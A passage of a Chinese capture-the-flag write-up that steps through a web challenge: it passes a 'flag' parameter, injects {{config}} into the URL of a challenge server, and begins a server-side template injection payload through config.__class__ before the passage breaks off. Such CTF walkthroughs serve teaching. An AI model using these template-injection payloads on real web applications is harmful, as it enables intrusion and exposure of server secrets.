1.打开题目 由提示可知需要传入一个名为flag的参数 2.查看网页源代码 并没有得到有用的信息 3.查看config对象 http://114.67.175.224:10934/?flag={{config}} 信息太乱了，需要找到我们需要的信息 4.SSTI模版注入 http://114.67.175.224:10934/?flag={{ config.__clas